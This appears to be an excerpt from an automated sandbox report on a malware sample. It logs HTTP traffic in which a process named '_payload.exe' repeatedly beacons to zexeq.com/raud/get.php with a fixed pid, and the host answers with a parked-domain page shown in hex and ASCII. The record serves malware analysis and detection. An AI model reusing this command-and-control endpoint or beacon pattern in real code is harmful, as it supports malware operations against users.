                                                                                                Jan 26, 2024 01:36:00.286905050 CET136OUTGET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
                                                                                                User-Agent: Microsoft Internet Explorer
                                                                                                Host: zexeq.com
                                                                                                Jan 26, 2024 01:36:00.406033993 CET1286INHTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Fri, 26 Jan 2024 00:36:00 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Set-Cookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950; expires=Fri, 26 Jan 2024 00:51:00 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ==
                                                                                                Cache-Control: no-cache
                                                                                                Accept-CH: sec-ch-prefers-color-scheme
                                                                                                Critical-CH: sec-ch-prefers-color-scheme
                                                                                                Vary: sec-ch-prefers-color-scheme
                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                Cache-Control: no-store, must-revalidate
                                                                                                Cache-Control: post-check=0, pre-check=0
                                                                                                Pragma: no-cache
                                                                                                Data Raw: 33 39 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6d 61 6f 33 78 5a 68 2f 6b 6e 55 6f 54 49 79 42 6f 33 61 33 43 43 75 34 4b 6e 70 70 52 6c 59 6a 6d 72 61 38 34 35 43 68 63 4b 39 4b 66 63 43 36 6f 79 45 51 33 57 52 30 6a 54 75 39 54 71 4d 36 42 6a 53 32 65 43 68 4d 78 37 4d 43 62 65 31 4c 39 4e 35 32 58 51 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69
                                                                                                Data Ascii: 393<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
                                                                                                Jan 26, 2024 01:36:00.406092882 CET457INData Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4d 57 5a 69 4f 44 64 68 4f 47 49 74 59 7a 4a 6c 5a 53 31 6c 4f 44 55 78 4c 54 6b 34 59 6a 4d 74 4e 32
                                                                                                Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMWZiODdhOGItYzJlZS1lODUxLTk4YjMtN2E4YTNhYTRkOTUwIiwicGFnZV90aW1lIjoxNzA2MjI5MzYwLCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzcmZml
                                                                                                Jan 26, 2024 01:36:00.406128883 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0
                                                                                                Jan 26, 2024 01:36:05.450329065 CET198OUTGET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
                                                                                                User-Agent: Microsoft Internet Explorer
                                                                                                Host: zexeq.com
                                                                                                Cookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950
                                                                                                Jan 26, 2024 01:36:05.569555998 CET1286INHTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Fri, 26 Jan 2024 00:36:05 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Set-Cookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950; expires=Fri, 26 Jan 2024 00:51:05 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ==
                                                                                                Cache-Control: no-cache
                                                                                                Accept-CH: sec-ch-prefers-color-scheme
                                                                                                Critical-CH: sec-ch-prefers-color-scheme
                                                                                                Vary: sec-ch-prefers-color-scheme
                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                Cache-Control: no-store, must-revalidate
                                                                                                Cache-Control: post-check=0, pre-check=0
                                                                                                Pragma: no-cache
                                                                                                Data Raw: 33 39 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6d 61 6f 33 78 5a 68 2f 6b 6e 55 6f 54 49 79 42 6f 33 61 33 43 43 75 34 4b 6e 70 70 52 6c 59 6a 6d 72 61 38 34 35 43 68 63 4b 39 4b 66 63 43 36 6f 79 45 51 33 57 52 30 6a 54 75 39 54 71 4d 36 42 6a 53 32 65 43 68 4d 78 37 4d 43 62 65 31 4c 39 4e 35 32 58 51 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69
                                                                                                Data Ascii: 393<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
                                                                                                Jan 26, 2024 01:36:05.569621086 CET457INData Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4d 57 5a 69 4f 44 64 68 4f 47 49 74 59 7a 4a 6c 5a 53 31 6c 4f 44 55 78 4c 54 6b 34 59 6a 4d 74 4e 32
                                                                                                Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMWZiODdhOGItYzJlZS1lODUxLTk4YjMtN2E4YTNhYTRkOTUwIiwicGFnZV90aW1lIjoxNzA2MjI5MzY1LCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzcmZml
                                                                                                Jan 26, 2024 01:36:05.569658995 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0
                                                                                                Jan 26, 2024 01:36:10.606481075 CET198OUTGET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
                                                                                                User-Agent: Microsoft Internet Explorer
                                                                                                Host: zexeq.com
                                                                                                Cookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950
                                                                                                Jan 26, 2024 01:36:10.725145102 CET1286INHTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Fri, 26 Jan 2024 00:36:10 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Set-Cookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950; expires=Fri, 26 Jan 2024 00:51:10 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ==
                                                                                                Cache-Control: no-cache
                                                                                                Accept-CH: sec-ch-prefers-color-scheme
                                                                                                Critical-CH: sec-ch-prefers-color-scheme
                                                                                                Vary: sec-ch-prefers-color-scheme
                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                Cache-Control: no-store, must-revalidate
                                                                                                Cache-Control: post-check=0, pre-check=0
                                                                                                Pragma: no-cache
                                                                                                Data Raw: 33 39 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6d 61 6f 33 78 5a 68 2f 6b 6e 55 6f 54 49 79 42 6f 33 61 33 43 43 75 34 4b 6e 70 70 52 6c 59 6a 6d 72 61 38 34 35 43 68 63 4b 39 4b 66 63 43 36 6f 79 45 51 33 57 52 30 6a 54 75 39 54 71 4d 36 42 6a 53 32 65 43 68 4d 78 37 4d 43 62 65 31 4c 39 4e 35 32 58 51 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69
                                                                                                Data Ascii: 393<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
                                                                                                Jan 26, 2024 01:36:10.725246906 CET457INData Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4d 57 5a 69 4f 44 64 68 4f 47 49 74 59 7a 4a 6c 5a 53 31 6c 4f 44 55 78 4c 54 6b 34 59 6a 4d 74 4e 32
                                                                                                Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMWZiODdhOGItYzJlZS1lODUxLTk4YjMtN2E4YTNhYTRkOTUwIiwicGFnZV90aW1lIjoxNzA2MjI5MzcwLCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzcmZml
                                                                                                Jan 26, 2024 01:36:10.725286961 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0
                                                                                                Jan 26, 2024 01:36:15.746963024 CET198OUTGET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
                                                                                                User-Agent: Microsoft Internet Explorer
                                                                                                Host: zexeq.com
                                                                                                Cookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950
                                                                                                Jan 26, 2024 01:36:15.865904093 CET1286INHTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Fri, 26 Jan 2024 00:36:15 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Set-Cookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950; expires=Fri, 26 Jan 2024 00:51:15 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ==
                                                                                                Cache-Control: no-cache
                                                                                                Accept-CH: sec-ch-prefers-color-scheme
                                                                                                Critical-CH: sec-ch-prefers-color-scheme
                                                                                                Vary: sec-ch-prefers-color-scheme
                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                Cache-Control: no-store, must-revalidate
                                                                                                Cache-Control: post-check=0, pre-check=0
                                                                                                Pragma: no-cache
                                                                                                Data Raw: 33 39 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6d 61 6f 33 78 5a 68 2f 6b 6e 55 6f 54 49 79 42 6f 33 61 33 43 43 75 34 4b 6e 70 70 52 6c 59 6a 6d 72 61 38 34 35 43 68 63 4b 39 4b 66 63 43 36 6f 79 45 51 33 57 52 30 6a 54 75 39 54 71 4d 36 42 6a 53 32 65 43 68 4d 78 37 4d 43 62 65 31 4c 39 4e 35 32 58 51 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69
                                                                                                Data Ascii: 393<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
                                                                                                Jan 26, 2024 01:36:15.865948915 CET457INData Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4d 57 5a 69 4f 44 64 68 4f 47 49 74 59 7a 4a 6c 5a 53 31 6c 4f 44 55 78 4c 54 6b 34 59 6a 4d 74 4e 32
                                                                                                Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMWZiODdhOGItYzJlZS1lODUxLTk4YjMtN2E4YTNhYTRkOTUwIiwicGFnZV90aW1lIjoxNzA2MjI5Mzc1LCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzcmZml
                                                                                                Jan 26, 2024 01:36:15.865986109 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.449734199.59.242.150807148C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 26, 2024 01:36:01.251174927 CET187OUTGET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
                                                                                                User-Agent: Microsoft Internet Explorer
                                                                                                Host: zexeq.com
                                                                                                Cookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950
                                                                                                Jan 26, 2024 01:36:01.367522001 CET1286INHTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Fri, 26 Jan 2024 00:36:01 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Set-Cookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950; expires=Fri, 26 Jan 2024 00:51:01 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n75xuvH1ruuh5wuSad1OP5wNm7LsolZxzMWMgrdmCkrjFmGI0KLCAxbuBHnzTOilT/h6ps2rqpBqNktqWhDXuA==
                                                                                                Cache-Control: no-cache
                                                                                                Accept-CH: sec-ch-prefers-color-scheme
                                                                                                Critical-CH: sec-ch-prefers-color-scheme
                                                                                                Vary: sec-ch-prefers-color-scheme
                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                Cache-Control: no-store, must-revalidate
                                                                                                Cache-Control: post-check=0, pre-check=0
                                                                                                Pragma: no-cache
                                                                                                Data Raw: 33 38 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 37 35 78 75 76 48 31 72 75 75 68 35 77 75 53 61 64 31 4f 50 35 77 4e 6d 37 4c 73 6f 6c 5a 78 7a 4d 57 4d 67 72 64 6d 43 6b 72 6a 46 6d 47 49 30 4b 4c 43 41 78 62 75 42 48 6e 7a 54 4f 69 6c 54 2f 68 36 70 73 32 72 71 70 42 71 4e 6b 74 71 57 68 44 58 75 41 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69
                                                                                                Data Ascii: 383<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n75xuvH1ruuh5wuSad1OP5wNm7LsolZxzMWMgrdmCkrjFmGI0KLCAxbuBHnzTOilT/h6ps2rqpBqNktqWhDXuA=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
                                                                                                Jan 26, 2024 01:36:01.367585897 CET441INData Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4d 57 5a 69 4f 44 64 68 4f 47 49 74 59 7a 4a 6c 5a 53 31 6c 4f 44 55 78 4c 54 6b 34 59 6a 4d 74 4e 32
                                                                                                Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMWZiODdhOGItYzJlZS1lODUxLTk4YjMtN2E4YTNhYTRkOTUwIiwicGFnZV90aW1lIjoxNzA2MjI5MzYxLCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzciLCJ
                                                                                                Jan 26, 2024 01:36:01.367625952 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0
                                                                                                Jan 26, 2024 01:36:06.388365984 CET187OUTGET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
                                                                                                User-Agent: Microsoft Internet Explorer
                                                                                                Host: zexeq.com
                                                                                                Cookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950
                                                                                                Jan 26, 2024 01:36:06.504700899 CET1286INHTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Fri, 26 Jan 2024 00:36:06 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Set-Cookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950; expires=Fri, 26 Jan 2024 00:51:06 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n75xuvH1ruuh5wuSad1OP5wNm7LsolZxzMWMgrdmCkrjFmGI0KLCAxbuBHnzTOilT/h6ps2rqpBqNktqWhDXuA==
                                                                                                Cache-Control: no-cache
                                                                                                Accept-CH: sec-ch-prefers-color-scheme
                                                                                                Critical-CH: sec-ch-prefers-color-scheme
                                                                                                Vary: sec-ch-prefers-color-scheme
                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                Cache-Control: no-store, must-revalidate
                                                                                                Cache-Control: post-check=0, pre-check=0
                                                                                                Pragma: no-cache
